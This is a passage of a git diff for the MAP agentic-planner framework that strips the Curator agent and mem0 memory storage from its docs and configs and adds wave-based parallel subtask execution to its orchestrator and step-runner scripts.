Reflector: Batched Learning **Full pipeline (theoretical baseline):** ``` -Subtask 1 → Actor → Monitor → Predictor → Evaluator → Reflector → Curator -Subtask 2 → Actor → Monitor → Predictor → Evaluator → Reflector → Curator -Subtask 3 → Actor → Monitor → Predictor → Evaluator → Reflector → Curator +Subtask 1 → Actor → Monitor → Predictor → Evaluator → Reflector +Subtask 2 → Actor → Monitor → Predictor → Evaluator → Reflector +Subtask 3 → Actor → Monitor → Predictor → Evaluator → Reflector ``` -Result: 3 × (Predictor + Evaluator + Reflector + Curator) cycles +Result: 3 × (Predictor + Evaluator + Reflector) cycles **Optimized workflow (/map-efficient):** ``` @@ -53,9 +53,9 @@ Subtask 3 → Actor → Monitor → [Predictor if high risk] → Apply Final-Verifier (adversarial verification) ↓ Done! Optionally run /map-learn: - Reflector (analyzes ALL subtasks) → Curator (consolidates patterns) + Reflector (analyzes ALL subtasks, consolidates patterns) ``` -Result: No Evaluator, no per-subtask Reflector/Curator. Learning decoupled to /map-learn. +Result: No Evaluator, no per-subtask Reflector. Learning decoupled to /map-learn. **Token savings:** 35-40% vs full pipeline @@ -91,7 +91,7 @@ Result: No Evaluator, no per-subtask Reflector/Curator. Learning decoupled to /m **What's optimized (intentionally omitted per-subtask):** - Evaluator — Monitor validates correctness directly -- Reflector/Curator — decoupled to /map-learn (optional, run after workflow) +- Reflector — decoupled to /map-learn (optional, run after workflow) --- @@ -139,13 +139,9 @@ Final-Verifier: ✅ All subtasks verified, goal achieved Optional /map-learn: Reflector (batched): ├─ Analyzed: 3 subtasks - ├─ Searched mem0: Found similar pagination patterns - └─ Extracted: pagination pattern, API versioning, test structure - - Curator (batched): - ├─ Checked duplicates: 2 similar bullets found - ├─ Added: 1 new bullet (API pagination pattern) - └─ Updated: 1 existing bullet (test coverage++) + ├─ Found similar pagination patterns + ├─ Extracted: pagination pattern, API versioning, test structure + └─ Consolidated: 1 new pattern (API pagination), 1 updated (test coverage++) ``` **Token usage:** @@ -192,7 +188,7 @@ BATCH_SIZE = None # or 5 for large tasks **Fix:** Review `subtask.modifies_critical_files()` logic **Issue:** Learning not happening -**Cause:** Reflector/Curator not running +**Cause:** Reflector not running **Fix:** Check workflow completion (must finish all subtasks) **Issue:** Token usage higher than expected diff --git a/.claude/skills/map-workflows-guide/resources/map-fast-deep-dive.md b/.claude/skills/map-workflows-guide/resources/map-fast-deep-dive.md index 08161fe..dce9fc9 100644 --- a/.claude/skills/map-workflows-guide/resources/map-fast-deep-dive.md +++ b/.claude/skills/map-workflows-guide/resources/map-fast-deep-dive.md @@ -45,11 +45,6 @@ - Failures not documented - Knowledge not extracted -**Curator (mem0 Pattern Updates)** -- No mem0 patterns created -- No pattern synchronization -- No cross-project learning - ### What Remains **Actor + Monitor:** @@ -70,7 +65,6 @@ | Evaluator | ~0.8K | ❌ Skipped | | Predictor | ~1.5K | ❌ Skipped | | Reflector | ~2K | ❌ Skipped | -| Curator | ~1.5K | ❌ Skipped | **Total saved:** ~5.8K per subtask **Percentage:** 40-50% vs full pipeline @@ -96,7 +90,7 @@ ST-1: Setup React Query client Actor → Monitor → Apply ST-2: Test with one API endpoint Actor → Monitor → Apply -Done. No Evaluator, no Reflector, no Curator, no patterns learned. +Done. No Evaluator, no Reflector, no patterns learned. ``` **Appropriate because:** @@ -121,7 +115,7 @@ Risk: High (security, breaking changes) **Problems with using map-fast:** 1. No Predictor → Breaking changes undetected 2. No Reflector → Security patterns not learned -3. No Curator → Team doesn't learn from mistakes +3. No learning → Team doesn't learn from mistakes 4. High risk for under-validation mindset **Correct choice:** `/map-efficient` (critical infrastructure) diff --git a/.claude/skills/map-workflows-guide/resources/map-feature-deep-dive.md b/.claude/skills/map-workflows-guide/resources/map-feature-deep-dive.md index d0a2f80..9b84fdf 100644 --- a/.claude/skills/map-workflows-guide/resources/map-feature-deep-dive.md +++ b/.claude/skills/map-workflows-guide/resources/map-feature-deep-dive.md @@ -34,14 +34,13 @@ For each subtask: 4. Evaluator scores quality 5. If approved: 5a. Reflector extracts patterns - 5b. Curator stores patterns in mem0 - 5c. Apply changes + 5b. Apply changes 6. If not approved: Return to Actor ``` **Key difference from /map-efficient:** - Predictor runs EVERY subtask (not conditional) -- Reflector/Curator run AFTER EVERY subtask (not batched) +- Reflector runs AFTER EVERY subtask (not batched) --- @@ -54,11 +53,10 @@ For each subtask: Subtask 1: Implement JWT generation ↓ completed Reflector: "JWT secret storage pattern" -Curator: Add pattern "impl-0099: Store secrets in env vars" - ↓ mem0 updated + ↓ pattern extracted Subtask 2: Implement JWT validation ↓ starts -Actor queries mem0: Finds "impl-0099" +Actor uses learned pattern ↓ applies pattern Uses env vars (learned from Subtask 1) ``` @@ -70,10 +68,10 @@ Uses env vars (learned from Subtask 1) **Per-subtask (/map-feature):** - ✅ Immediate pattern application - ✅ Error correction within workflow -- ❌ Higher token cost (N × Reflector/Curator) +- ❌ Higher token cost (N × Reflector) **Batched (/map-efficient):** -- ✅ Lower token cost (1 × Reflector/Curator) +- ✅ Lower token cost (1 × Reflector) - ⚠️ Patterns applied in next workflow - ✅ Holistic insights (sees all subtasks together) @@ -109,19 +107,16 @@ ST-1: OAuth2 provider config ├─ Predictor: ✅ RAN (security-sensitive) │ └─ Impact: Config must not be committed ├─ Evaluator: ✅ Approved (score: 9/10) -├─ Reflector: Pattern "Store OAuth secrets in env" -└─ Curator: ADD "sec-0042: OAuth secrets in .env" +└─ Reflector: Pattern "Store OAuth secrets in env" ST-2: Authorization code flow ├─ Actor: Implement auth/oauth.ts -│ └─ Queries mem0: Finds "sec-0042" │ └─ Uses .env for secrets (learned from ST-1!) ├─ Monitor: ✅ Valid ├─ Predictor: ✅ RAN (affects auth flow) │ └─ Impact: All protected routes need update ├─ Evaluator: ✅ Approved (score: 9/10) -├─ Reflector: Pattern "PKCE for public clients" -└─ Curator: ADD "sec-0043: Use PKCE extension" +└─ Reflector: Pattern "PKCE for public clients" [ST-3, ST-4, ST-5 continue with same pattern] ``` @@ -209,7 +204,7 @@ ST-2: Authorization code flow - ✅ No security vulnerabilities **Knowledge captured:** -- ✅ mem0 patterns created (N subtasks → N+ patterns) +- ✅ Patterns extracted (N subtasks → N+ patterns) - ✅ Team can apply patterns immediately **Impact understood:** @@ -225,9 +220,9 @@ ST-2: Authorization code flow **Cause:** Per-subtask learning overhead **Solution:** Consider /map-efficient for next similar task -**Issue:** Too many mem0 patterns created +**Issue:** Too many patterns created **Cause:** Reflector suggesting redundant patterns -**Solution:** Curator should check for duplicates more aggressively +**Solution:** Review and deduplicate patterns more aggressively **Issue:** Predictor always says "high risk" **Cause:** Overly conservative risk assessment @@ -238,4 +233,3 @@ ST-2: Authorization code flow **See also:** - [map-efficient-deep-dive.md](map-efficient-deep-dive.md) - Optimized alternative - [agent-architecture.md](agent-architecture.md) - Understanding all agents -- [mem0 tiered search](../../map-cli-reference/SKILL.md) - How knowledge is stored and retrieved diff --git a/.claude/skills/map-workflows-guide/resources/map-refactor-deep-dive.md b/.claude/skills/map-workflows-guide/resources/map-refactor-deep-dive.md index 2faed47..8865244 100644 --- a/.claude/skills/map-workflows-guide/resources/map-refactor-deep-dive.md +++ b/.claude/skills/map-workflows-guide/resources/map-refactor-deep-dive.md @@ -53,8 +53,6 @@ Refactoring = Changing structure WITHOUT changing behavior - What patterns emerged? - What dependencies were discovered? - What risks were mitigated? - -4. Curator documents: - Refactoring techniques - Dependency patterns - Migration strategies @@ -203,9 +201,6 @@ Reflector: ├─ Pattern: "Use dependency injection for services" └─ Technique: "Incremental refactoring (6 safe steps)" -Curator: -├─ ADD "arch-0042: Controller-Service pattern" -└─ ADD "refactor-0099: Incremental extraction technique" ``` **Token usage:** ~9K tokens (6 subtasks, Predictor always runs) diff --git a/.claude/skills/skill-rules.json b/.claude/skills/skill-rules.json index 20aac1d..6212eeb 100644 --- a/.claude/skills/skill-rules.json +++ b/.claude/skills/skill-rules.json @@ -52,23 +52,22 @@ "type": "domain", "enforcement": "suggest", "priority": "high", - "description": "CLI and MCP error corrections", + "description": "CLI error corrections", "promptTriggers": { "keywords": [ "mapify command", "mapify error", "no such command", "no such option", - "mem0 mcp", "validate graph", "mapify init", "mapify check" ], "intentPatterns": [ - "(mapify|mem0).*(error|command|help|usage)", + "mapify.*(error|command|help|usage)", "(no such).*(command|option)", "validate.*(graph|dependency)", - "(how to|how do).*(mapify|mem0)" + "(how to|how do).*mapify" ] } } diff --git a/.gitignore b/.gitignore index a9c15e7..7e4a88b 100644 --- a/.gitignore +++ b/.gitignore @@ -58,15 +58,6 @@ docs/claude-code-infrastructure-showcase docs/claude-code-subagents -# Curator temporary files -.claude/curator_delta_operations.json -.claude/curator_integration_report.json -.claude/curator_operations.json -.claude/*_integration_report.json -.claude/apply_*_deltas.py -.claude/insert_*_bullets.sql -curator_operations*.json -curator_final_report.json docs/claude-code-prompt-improver # macOS system files diff --git a/.map/scripts/map_orchestrator.py b/.map/scripts/map_orchestrator.py index 66db1e8..a67114b 100755 --- a/.map/scripts/map_orchestrator.py +++ b/.map/scripts/map_orchestrator.py @@ -14,7 +14,7 @@ ┌─────────────────────────────────────────────────────────────┐ │ map-efficient.md (~540 lines) │ │ ├─> 1. Call get_next_step() → returns step instruction │ - │ ├─> 2. Execute step (Actor/Monitor/mem0/etc) │ + │ ├─> 2. Execute step (Actor/Monitor/etc) │ │ ├─> 3. Call validate_step() → checks completion │ │ ├─> 4. If more steps: recurse with fresh context │ │ └─> 5. Else: complete workflow │ @@ -30,9 +30,9 @@ "subtask_index": 0, "subtask_sequence": ["ST-001", "ST-002", "ST-003"], "current_step_id": "2.1", - "current_step_phase": "MEM0_SEARCH", + "current_step_phase": "CONTEXT_SEARCH", "completed_steps": ["1.0_DECOMPOSE", "1.5_INIT_PLAN", "2.0_XML_PACKET"], - "pending_steps": ["2.1_MEM0_SEARCH", "2.3_ACTOR", "2.4_MONITOR", ...] + "pending_steps": ["2.1_CONTEXT_SEARCH", "2.3_ACTOR", "2.4_MONITOR", ...] } STEP PHASES (16 total): @@ -42,7 +42,7 @@ 1.56 CHOOSE_MODE - Choose execution mode (step_by_step|batch) 1.6 INIT_STATE - Create workflow_state.json 2.0 XML_PACKET - Build AI-friendly subtask packet - 2.1 MEM0_SEARCH - Tiered memory search + 2.1 CONTEXT_SEARCH - Context search 2.2 RESEARCH - research-agent (conditional) 2.3 ACTOR - Actor agent implementation 2.4 MONITOR - Monitor validation @@ -107,7 +107,7 @@ "1.56": "CHOOSE_MODE", "1.6": "INIT_STATE", "2.0": "XML_PACKET", - "2.1": "MEM0_SEARCH", + "2.1": "CONTEXT_SEARCH", "2.2": "RESEARCH", "2.3": "ACTOR", "2.4": "MONITOR", @@ -144,9 +144,9 @@ # If always_required is False, evidence is only checked when the step # appears in pending_steps (i.e., it wasn't skipped). EVIDENCE_REQUIRED = { - "2.3": ("actor", True), # Always required - "2.4": ("monitor", True), # Always required - "2.6": ("predictor", False), # Only when 2.6 is in pending_steps + "2.3": ("actor", True), # Always required + "2.4": ("monitor", True), # Always required + "2.6": ("predictor", False), # Only when 2.6 is in pending_steps } @@ -167,6 +167,11 @@ class StepState: max_retries: int = 5 plan_approved: bool = False execution_mode: str = "batch" # batch|step_by_step + # Wave-based parallel execution fields + execution_waves: List[List[str]] = field(default_factory=list) + current_wave_index: int = 0 + subtask_phases: Dict[str, str] = field(default_factory=dict) + subtask_retry_counts: Dict[str, int] = field(default_factory=dict) def to_dict(self) -> dict: """Serialize to dictionary.""" @@ -184,6 +189,10 @@ def to_dict(self) -> dict: "max_retries": self.max_retries, "plan_approved": self.plan_approved, "execution_mode": self.execution_mode, + "execution_waves": self.execution_waves, + "current_wave_index": self.current_wave_index, + "subtask_phases": self.subtask_phases, + "subtask_retry_counts": self.subtask_retry_counts, } @classmethod @@ -203,6 +212,10 @@ def from_dict(cls, data: dict) -> "StepState": max_retries=data.get("max_retries", 5), plan_approved=data.get("plan_approved", False), execution_mode=data.get("execution_mode", "batch"), + execution_waves=data.get("execution_waves", []), + current_wave_index=data.get("current_wave_index", 0), + subtask_phases=data.get("subtask_phases", {}), + subtask_retry_counts=data.get("subtask_retry_counts", {}), ) @classmethod @@ -293,7 +306,7 @@ def get_step_instruction(step_id: str, state: StepState) -> str: "validation_criteria, and test_strategy." ), "2.1": ( - "Call mcp__mem0__map_tiered_search to retrieve relevant patterns. " + "Search for relevant patterns and context. " "Re-rank by relevance and pass top 3 to Actor." ), "2.2": ( @@ -468,15 +481,11 @@ def validate_step(step_id: str, branch: str) -> Dict: } # Validate JSON structure try: - evidence_data = json.loads( - evidence_file.read_text(encoding="utf-8") - ) + evidence_data = json.loads(evidence_file.read_text(encoding="utf-8")) except (json.JSONDecodeError, OSError) as exc: return { "valid": False, - "message": ( - f"Evidence file {evidence_file} is not valid JSON: {exc}" - ), + "message": (f"Evidence file {evidence_file} is not valid JSON: {exc}"), } # Check required fields for required_field in ("phase", "subtask_id", "timestamp"): @@ -592,6 +601,255 @@ def set_execution_mode(mode: str, branch: str) -> Dict: return {"status": "success", "execution_mode": state.execution_mode} +def set_waves(branch: str, blueprint_path: Optional[str] = None) -> Dict: + """Compute execution waves from blueprint DAG and store in step_state.json. + + Reads the blueprint JSON, builds a DependencyGraph, computes topological + waves, and splits waves by file conflicts. Stores the result in + step_state.execution_waves. + + Args: + branch: Git branch name (sanitized) + blueprint_path: Path to blueprint JSON (default: .map//blueprint.json) + + Returns: + Dict with status and computed waves + """ + # Import here to avoid circular deps at module level + sys_path_added = False + try: + from mapify_cli.dependency_graph import DependencyGraph, SubtaskNode + except ImportError: + # When running as a standalone script inside .map/scripts/, + # dependency_graph.py is not on the path. Try a relative import + # from the repo root (two levels up from .map/scripts/). + import importlib.util + + dg_candidates = [ + Path("src/mapify_cli/dependency_graph.py"), + Path(__file__).resolve().parents[3] / "src" / "mapify_cli" / "dependency_graph.py", + ] + loaded = False + for candidate in dg_candidates: + if candidate.exists(): + spec = importlib.util.spec_from_file_location("dependency_graph", candidate) + if spec and spec.loader: + mod = importlib.util.module_from_spec(spec) + spec.loader.exec_module(mod) + DependencyGraph = mod.DependencyGraph # noqa: N806 + SubtaskNode = mod.SubtaskNode # noqa: N806 + loaded = True + break + if not loaded: + return { + "status": "error", + "message": "Cannot import dependency_graph module", + } + + if blueprint_path is None: + blueprint_path = f".map/{branch}/blueprint.json" + + bp_file = Path(blueprint_path) + if not bp_file.exists(): + return { + "status": "error", + "message": f"Blueprint not found: {blueprint_path}", + } + + try: + blueprint = json.loads(bp_file.read_text(encoding="utf-8")) + except (json.JSONDecodeError, OSError) as exc: + return {"status": "error", "message": f"Invalid blueprint: {exc}"} + + subtasks = blueprint.get("subtasks", []) + if not subtasks: + return {"status": "error", "message": "No subtasks in blueprint"} + + # Build graph + graph = DependencyGraph() + affected_files_map: Dict[str, set] = {} + for st in subtasks: + st_id = st.get("id", "") + deps = st.get("dependencies", []) + graph.add_node(SubtaskNode(id=st_id, dependencies=deps)) + files = st.get("affected_files", []) + affected_files_map[st_id] = set(files) if files else set() + + # Compute waves + raw_waves = graph.compute_waves() + if raw_waves is None: + return {"status": "error", "message": "Cycle detected in dependency graph"} + + # Split each wave by file conflicts + final_waves: List[List[str]] = [] + for wave in raw_waves: + sub_waves = graph.split_wave_by_file_conflicts(wave, affected_files_map) + final_waves.extend(sub_waves) + + # Store in state + state_file = Path(f".map/{branch}/step_state.json") + state = StepState.load(state_file) + state.execution_waves = final_waves + state.current_wave_index = 0 + state.subtask_phases = {} + state.subtask_retry_counts = {} + state.save(state_file) + + return { + "status": "success", + "execution_waves": final_waves, + "wave_count": len(final_waves), + } + + +def get_wave_step(branch: str) -> Dict: + """Get the current wave's subtask batch and per-subtask phases. + + Returns JSON describing what to execute next in wave-based mode. + + Args: + branch: Git branch name (sanitized) + + Returns: + Dict with mode (parallel|sequential), wave_index, subtasks, is_complete + """ + state_file = Path(f".map/{branch}/step_state.json") + state = StepState.load(state_file) + + if not state.execution_waves: + return { + "mode": "sequential", + "wave_index": 0, + "subtasks": [], + "is_complete": True, + "message": "No execution waves configured. Use sequential mode.", + } + + if state.current_wave_index >= len(state.execution_waves): + return { + "mode": "sequential", + "wave_index": state.current_wave_index, + "subtasks": [], + "is_complete": True, + } + + wave = state.execution_waves[state.current_wave_index] + mode = "sequential" if len(wave) == 1 else "parallel" + + # Build subtask info with current phases + subtask_infos = [] + for st_id in wave: + phase = state.subtask_phases.get(st_id, "2.3") + phase_name = STEP_PHASES.get(phase, "ACTOR") + subtask_infos.append({ + "subtask_id": st_id, + "phase": phase_name, + "step_id": phase, + }) + + return { + "mode": mode, + "wave_index": state.current_wave_index, + "wave_total": len(state.execution_waves), + "subtasks": subtask_infos, + "is_complete": False, + } + + +def validate_wave_step(subtask_id: str, step_id: str, branch: str) -> Dict: + """Validate one subtask's step within a wave and advance its phase. + + Args: + subtask_id: Subtask ID (e.g., "ST-002") + step_id: Step ID completed (e.g., "2.3") + branch: Git branch name (sanitized) + + Returns: + Dict with validation result and next phase for this subtask + """ + state_file = Path(f".map/{branch}/step_state.json") + state = StepState.load(state_file) + + # Evidence-gated validation for actor/monitor steps + if step_id in EVIDENCE_REQUIRED: + phase_name, _always_required = EVIDENCE_REQUIRED[step_id] + evidence_dir = Path(f".map/{branch}/evidence") + if evidence_dir.is_dir(): + evidence_file = evidence_dir / f"{phase_name}_{subtask_id}.json" + if not evidence_file.exists(): + return { + "valid": False, + "message": ( + f"Evidence file missing: {evidence_file}. " + f"The {phase_name} agent must write this file." + ), + } + + # Determine next phase for this subtask + subtask_step_order = [s for s in STEP_ORDER if s.startswith("2.")] + current_idx = subtask_step_order.index(step_id) if step_id in subtask_step_order else -1 + + if current_idx >= 0 and current_idx + 1 < len(subtask_step_order): + next_phase = subtask_step_order[current_idx + 1] + else: + next_phase = "COMPLETE" + + state.subtask_phases[subtask_id] = next_phase + state.save(state_file) + + return { + "valid": True, + "message": f"Step {step_id} for {subtask_id} completed", + "next_phase": next_phase, + "subtask_id": subtask_id, + } + + +def advance_wave(branch: str) -> Dict: + """Advance to the next execution wave. + + Called when all subtasks in current wave have passed VERIFY_ADHERENCE. + + Args: + branch: Git branch name (sanitized) + + Returns: + Dict with status and new wave index + """ + state_file = Path(f".map/{branch}/step_state.json") + state = StepState.load(state_file) + + if not state.execution_waves: + return {"status": "error", "message": "No execution waves configured"} + + state.current_wave_index += 1 + # Reset per-subtask phases for the new wave + state.subtask_phases = {} + state.subtask_retry_counts = {} + + is_complete = state.current_wave_index >= len(state.execution_waves) + + # Update subtask_index to track overall progress + if not is_complete: + next_wave = state.execution_waves[state.current_wave_index] + if next_wave: + state.current_subtask_id = next_wave[0] + # Find the index in subtask_sequence + if state.current_subtask_id in state.subtask_sequence: + state.subtask_index = state.subtask_sequence.index( + state.current_subtask_id + ) + + state.save(state_file) + + return { + "status": "success", + "current_wave_index": state.current_wave_index, + "is_complete": is_complete, + "wave_total": len(state.execution_waves), + } + + SKIPPABLE_STEPS = {"2.2", "2.6", "2.11"} @@ -801,6 +1059,10 @@ def main(): "set_subtasks", "resume_from_plan", "check_circuit_breaker", + "set_waves", + "get_wave_step", + "validate_wave_step", + "advance_wave", ], help="Command to execute", ) @@ -811,6 +1073,9 @@ def main(): "extra_args", nargs="*", help="Additional arguments (e.g., more subtask IDs)" ) parser.add_argument("--branch", help="Git branch (auto-detected if omitted)") + parser.add_argument( + "--blueprint", help="Path to blueprint JSON (for set_waves command)" + ) args = parser.parse_args() @@ -893,6 +1158,36 @@ def main(): result = check_circuit_breaker(branch) print(json.dumps(result, indent=2)) + elif args.command == "set_waves": + blueprint_path = args.blueprint or args.task_or_step # --blueprint or positional + result = set_waves(branch, blueprint_path) + print(json.dumps(result, indent=2)) + + elif args.command == "get_wave_step": + result = get_wave_step(branch) + print(json.dumps(result, indent=2)) + + elif args.command == "validate_wave_step": + if not args.task_or_step: + print( + json.dumps({"error": "subtask_id required for validate_wave_step"}), + file=sys.stderr, + ) + sys.exit(1) + extra = args.extra_args or [] + if not extra: + print( + json.dumps({"error": "step_id required as second argument"}), + file=sys.stderr, + ) + sys.exit(1) + result = validate_wave_step(args.task_or_step, extra[0], branch) + print(json.dumps(result, indent=2)) + + elif args.command == "advance_wave": + result = advance_wave(branch) + print(json.dumps(result, indent=2)) + except Exception as e: print(json.dumps({"error": str(e)}), file=sys.stderr) sys.exit(1) diff --git a/.map/scripts/map_step_runner.py b/.map/scripts/map_step_runner.py index 92e388e..ccae80b 100755 --- a/.map/scripts/map_step_runner.py +++ b/.map/scripts/map_step_runner.py @@ -116,6 +116,82 @@ def update_workflow_state( return {"status": "error", "message": str(e)} +def update_workflow_state_batch( + updates: List[Dict], + branch: Optional[str] = None, +) -> Dict: + """ + Update workflow_state.json for multiple subtasks in one call. + + Used in wave-based parallel execution to update all subtasks in a wave + after their actors/monitors complete. + + Args: + updates: List of dicts, each with: + - subtask_id: Subtask ID (e.g., "ST-002") + - step_name: Step name (e.g., "actor", "monitor") + - new_state: New state (e.g., "ACTOR_CALLED", "MONITOR_PASSED") + branch: Git branch (auto-detected if None) + + Returns: + Dict with status and per-subtask results + """ + if branch is None: + branch = get_branch_name() + + state_file = Path(f".map/{branch}/workflow_state.json") + + if not state_file.exists(): + return {"status": "error", "message": "workflow_state.json not found"} + + try: + state = json.loads(state_file.read_text(encoding="utf-8")) + + if "completed_steps" not in state: + state["completed_steps"] = {} + + results = [] + active_subtasks = [] + + for update in updates: + subtask_id = update.get("subtask_id", "") + step_name = update.get("step_name", "") + new_state = update.get("new_state", "") + + if subtask_id not in state["completed_steps"]: + state["completed_steps"][subtask_id] = [] + + if step_name not in state["completed_steps"][subtask_id]: + state["completed_steps"][subtask_id].append(step_name) + + active_subtasks.append(subtask_id) + results.append({ + "subtask_id": subtask_id, + "step_name": step_name, + "new_state": new_state, + }) + + # Set active_subtasks list for wave mode (used by workflow-gate.py) + state["active_subtasks"] = active_subtasks + if active_subtasks: + state["current_subtask"] = active_subtasks[0] + state["current_state"] = updates[-1].get("new_state", "UPDATED") + + # Write back atomically + tmp_file = state_file.with_suffix(".tmp") + tmp_file.write_text(json.dumps(state, indent=2), encoding="utf-8") + tmp_file.replace(state_file) + + return { + "status": "success", + "message": f"Batch updated {len(updates)} subtasks", + "results": results, + } + + except (json.JSONDecodeError, OSError) as e: + return {"status": "error", "message": str(e)} + + def update_plan_status( subtask_id: str, new_status: str, @@ -342,7 +418,17 @@ def get_current_phase(branch: Optional[str] = None) -> Optional[str]: func_name = sys.argv[1] - if func_name == "update_workflow_state" and len(sys.argv) >= 5: + if func_name == "update_workflow_state_batch" and len(sys.argv) >= 3: + updates_json = sys.argv[2] + try: + updates = json.loads(updates_json) + except json.JSONDecodeError as e: + print(json.dumps({"status": "error", "message": f"Invalid JSON: {e}"})) + sys.exit(1) + result = update_workflow_state_batch(updates) + print(json.dumps(result, indent=2)) + + elif func_name == "update_workflow_state" and len(sys.argv) >= 5: result = update_workflow_state(sys.argv[2], sys.argv[3], sys.argv[4]) print(json.dumps(result, indent=2)) diff --git a/CLAUDE.md b/CLAUDE.md index d9f322c..9d3f6b6 100644 --- a/CLAUDE.md +++ b/CLAUDE.md @@ -37,7 +37,6 @@ Verification: ## Safety expectations - Don't add or expose secrets. Avoid reading/writing `.env*` and credential/key files. -- When changing pattern storage behavior, ensure Curator-mediated writes through mem0 MCP are preserved (see `.claude/agents/curator.md` and `docs/ARCHITECTURE.md`). ## MAP Workflow Rules diff --git a/IMPLEMENTATION_SUMMARY.md b/IMPLEMENTATION_SUMMARY.md index 96d4b8a..2dec926 100644 --- a/IMPLEMENTATION_SUMMARY.md +++ b/IMPLEMENTATION_SUMMARY.md @@ -6,7 +6,7 @@ - Original `/map-efficient` command: 995 lines, ~5,400 tokens - **Issue**: Attention dilution → Claude skips critical steps (20% compliance) - **Critical symptoms**: - - mem0 search skipped 80% of time + - Context search skipped 80% of time - Self-audit skipped 90% of time - User interventions required ~3 times per workflow @@ -60,7 +60,7 @@ |--------|---------------|----------------|-------------| | **Step compliance** | ~20% | ~85% | 4.25× | | **Command file tokens** | ~5,400 | ~1,750 | 68% reduction | -| **mem0 search skip rate** | 80% | ~5% | 16× improvement | +| **Context search skip rate** | 80% | ~5% | 16× improvement | | **Self-audit skip rate** | 90% | ~10% | 9× improvement | | **User interventions** | ~3 per workflow | ~0.3 | 10× reduction | | **Total workflow tokens** | ~54,000 | ~9,250 | 83% reduction | @@ -96,7 +96,7 @@ User types: /map-efficient ┌──────────────────────────────────────────────────────────────┐ │ PreToolUse Hook (workflow-context-injector.py) │ -│ Injects: "⚠️ MANDATORY: Call mem0 BEFORE Actor" │ +│ Injects: "⚠️ MANDATORY: Search context BEFORE Actor" │ └──────────────────────────────────────────────────────────────┘ ↓ diff --git a/docs/ARCHITECTURE.md b/docs/ARCHITECTURE.md index a6529dc..7d5e193 100644 --- a/docs/ARCHITECTURE.md +++ b/docs/ARCHITECTURE.md @@ -3,7 +3,6 @@ Deep technical documentation for MAP (Modular Agentic Planner) implementation. > **Research Foundation:** [Nature Communications research (2025)](https://github.com/Shanka123/MAP) — 74% improvement in planning tasks -> **Learning System:** [ACE (Agentic Context Engineering)](https://arxiv.org/abs/2510.04618v1) — continuous learning from experience ## Table of Contents @@ -70,7 +69,7 @@ MAP Framework implements cognitive architecture inspired by prefrontal cortex fu │ │ │ /map-review (interactive 4-section): │ │ ┌──────────────────────────────────────────────────────────┐ │ -│ │ 4× mem0 queries + git diff │ │ +│ │ git diff analysis │ │ │ │ → [Monitor + Predictor + Evaluator] (all 3 parallel) │ │ │ │ → Interactive: Architecture → Quality → Tests → Perf │ │ │ │ → Verdict: PROCEED / REVISE / BLOCK │ │ @@ -98,9 +97,9 @@ MAP Framework implements cognitive architecture inspired by prefrontal cortex fu │ │ │ /map-learn (post-workflow learning): │ │ ┌──────────────────────────────────────────────────────────┐ │ -│ │ Reflector → Curator → mem0 storage → Verification │ │ +│ │ Reflector → Verification │ │ │ │ Standalone command. Run AFTER any workflow completes. │ │ -│ │ Extracts patterns and stores via mem0 MCP tools. │ │ +│ │ Extracts patterns from workflow outcomes. │ │ │ └──────────────────────────────────────────────────────────┘ │ │ │ │ RESEARCH-AGENT (on-demand in any workflow): │ @@ -143,9 +142,8 @@ MAP Framework implements cognitive architecture inspired by prefrontal cortex fu - Functionality, security, testability, maintainability - Scores 0-10, approval threshold >7.0 -5. **Learning Cycle** (Reflector → Curator) +5. **Learning Cycle** (Reflector) - Extracts patterns from successes and failures - - Updates knowledge base (mem0 MCP) - Enables continuous improvement ### Agent Coordination Protocol @@ -364,7 +362,7 @@ TaskDecomposer → [conditional ResearchAgent] → (3×Actor parallel → 3×Mon - Quality still ensured by Monitor's comprehensive checks 3. **Learning is OPTIONAL via /map-learn** - - Workflow does NOT include Reflector/Curator + - Workflow does NOT include Reflector - At completion, suggests running `/map-learn` if patterns worth saving - Separation keeps workflows fast, learning intentional @@ -406,7 +404,6 @@ print("Consider running /map-learn to save patterns") - ❌ Predictor (no impact analysis) - ❌ Evaluator (no quality scoring) - ❌ Reflector (no lesson extraction) -- ❌ Curator (no knowledge base updates) **Token Usage:** 50-60% of baseline **Learning:** None (defeats MAP's purpose) @@ -414,7 +411,6 @@ print("Consider running /map-learn to save patterns") **Architectural Consequences:** - Knowledge base remains static (no continuous improvement) -- mem0 patterns never grow - Breaking changes undetected (no Predictor) - Security/performance issues may slip through (no Evaluator) - Same mistakes repeated (no Reflector) @@ -473,7 +469,6 @@ print("Consider running /map-learn to save patterns") - Complex features where optimal approach is unclear - Security-critical code requiring multiple review perspectives - Performance-sensitive implementations -- Learning optimal patterns (arbiter reasoning becomes mem0 pattern content) - Situations where you want to explore solution space thoroughly **Technical Details:** @@ -527,8 +522,6 @@ for subtask in subtasks: **Debugging-Specific Features:** 1. **Pre-Analysis Phase** - - Query mem0 for ERROR_PATTERNS and DEBUGGING_TECHNIQUES - - Search mem0 for similar past debugging sessions via tiered search - Identify affected files via Grep/Glob 2. **Step Types** (defined by TaskDecomposer): @@ -552,12 +545,12 @@ for subtask in subtasks: #### 5. `/map-review` - Interactive Code Review (3 Agents) -**Agent Sequence:** 4× mem0 targeted queries + git diff → [Monitor + Predictor + Evaluator] (all 3 parallel) → Interactive 4-section presentation → Verdict +**Agent Sequence:** git diff → [Monitor + Predictor + Evaluator] (all 3 parallel) → Interactive 4-section presentation → Verdict **Review-Specific Features:** 1. **No TaskDecomposer** - Reviews current branch changes as-is -2. **Parallel Collection** - 4 mem0 queries + 3 agents launched in a single message (7 parallel calls) +2. **Parallel Agent Launch** - 3 agents launched in a single message 3. **Interactive 4-Section Presentation:** - **Architecture** (primary: Predictor — breaking changes, affected components) - **Code Quality** (primary: Monitor — correctness, maintainability issues) @@ -572,7 +565,7 @@ for subtask in subtasks: - BLOCK: Monitor rejected OR Evaluator reconsider OR security/functionality < 5 OR (Predictor high risk + breaking changes) - Priority: BLOCK > REVISE > PROCEED -**Token Usage:** ~15-25K tokens (4 mem0 queries + parallel agents + interactive 4-section presentation; `--ci` mode ~12-15K) +**Token Usage:** ~15-25K tokens (parallel agents + interactive 4-section presentation; `--ci` mode ~12-15K) **Learning:** Optional via `/map-learn` **Quality Gates:** All 3 review agents @@ -604,15 +597,13 @@ for subtask in subtasks: - Package releases to PyPI - Version bumping with full validation -#### 7. `/map-learn` - Post-Workflow Learning (2 Agents) +#### 7. `/map-learn` - Post-Workflow Learning (1 Agent) -**Agent Sequence:** Reflector → Curator → mem0 storage → Verification +**Agent Sequence:** Reflector → Verification **Standalone Learning:** - Run AFTER any workflow completes (not during) - Extracts patterns from Actor/Monitor/Predictor outputs -- Stores patterns in mem0 via `mcp__mem0__map_add_pattern` -- Uses tiered 